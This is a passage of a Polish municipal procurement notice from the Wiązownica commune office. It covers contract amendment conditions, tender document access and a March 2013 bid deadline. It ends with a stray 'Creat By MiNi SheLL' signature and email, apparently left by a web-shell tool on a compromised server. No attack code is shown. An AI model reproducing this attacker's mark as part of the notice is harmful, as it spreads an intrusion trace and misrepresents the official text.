  najmniej 5 dni, 
      2) zmiany spowodowane nieprzewidzianymi w SIWZ warunkami geologicznymi, 
          archeologicznymi lub terenowymi, w szczególności niewypały, niewybuchy, 
          wykopaliska archeologiczne:
      3) odmienne od przyjętych w dokumentacji projektowej warunki geologiczne;
      4) odmienne  od przyjętych w dokumentacji projektowej warunki terenowe, w 
          szczególności istnienie nie zainwentaryzowanych lub błędnie zainwentaryzowanych 
          obiektów budowlanych;
      5) zmiany będące następstwem okoliczności leżących po stronie Zamawiającego w 
          szczególności:
         a) opóźnienie związane z przekazaniem  wykonawcy  terenu budowy oraz dokumentacji  
             budowlanej, 
         b) wstrzymania robót przez Zamawiającego,
         c) konieczności usunięcia błędów lub wprowadzenia zmian w dokumentacji projektowej 
             lub specyfikacji technicznej wykonania i odbioru robót,
         d) odmowa wydania przez organy administracji lub inne podmioty wymaganych decyzji, 
            zezwoleń, uzgodnień z przyczyn niezawinionych przez wykonawcę, w tym odmowa 
            udostępnienia przez właścicieli nieruchomości do celów realizacji inwestycji.
     II. Zmiana sposobu spełnienia świadczenia na skutek zmian technologicznych 
         spowodowanych w szczególności następującymi okolicznościami:
1)	niedostępność na rynku materiałów lub urządzeń wskazanych w dokumentacji projektowej lub specyfikacji technicznej, spowodowanej zaprzestaniem produkcji lub wycofaniem z rynku tych materiałów lub urządzeń,
2)	pojawienie się na rynku materiałów lub urządzeń nowszej generacji pozwalających na zaoszczędzeniu czasu realizacji przedmiotu umowy lub kosztów eksploatacji wykonanego przedmiotu umowy
3)	pojawienie się na rynku nowszej technologii wykonania zaprojektowanych robót pozwalającej na zaoszczędzenie czasu realizacji inwestycji lub kosztów wykonywanych prac, jak również kosztów eksploatacji wykonanego przedmiotu umowy,
4)	konieczność zrealizowania projektu przy zastosowaniu innych rozwiązań technicznych / technologicznych niż wskazane w dokumentacji projektowej, w sytuacji gdy zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub wadliwym wykonaniem przedmiotu umowy.
    III. Pozostałe rodzaje zmian spowodowane następującymi okolicznościami:
1)	siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ,
2)	zmiana obowiązującej stawki VAT,
3)	zmiana sposobu rozliczenia umowy lub dokonywania płatności na rzecz Wykonawcy na skutek zmian zawartej przez Zamawiającego umowy o dofinansowanie projektu lub wytycznych dotyczących realizacji projektu.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.wiazownica.com  lub www.bip.wiazownica.com<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Wiązownica
37-522 Wiązownica 208
pok. nr 42   II p.
Cena dokumentacji przetargowej  300 zł..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.03.2013 godzina 09:00, miejsce: Urząd Gminy Wiązownica
37-522 Wiązownica 208
Sekretariat Urzędu  pok. nr 22  I p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie będzie współfinansowane ze środków unijnych w ramach programu EFRR RPO WP.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com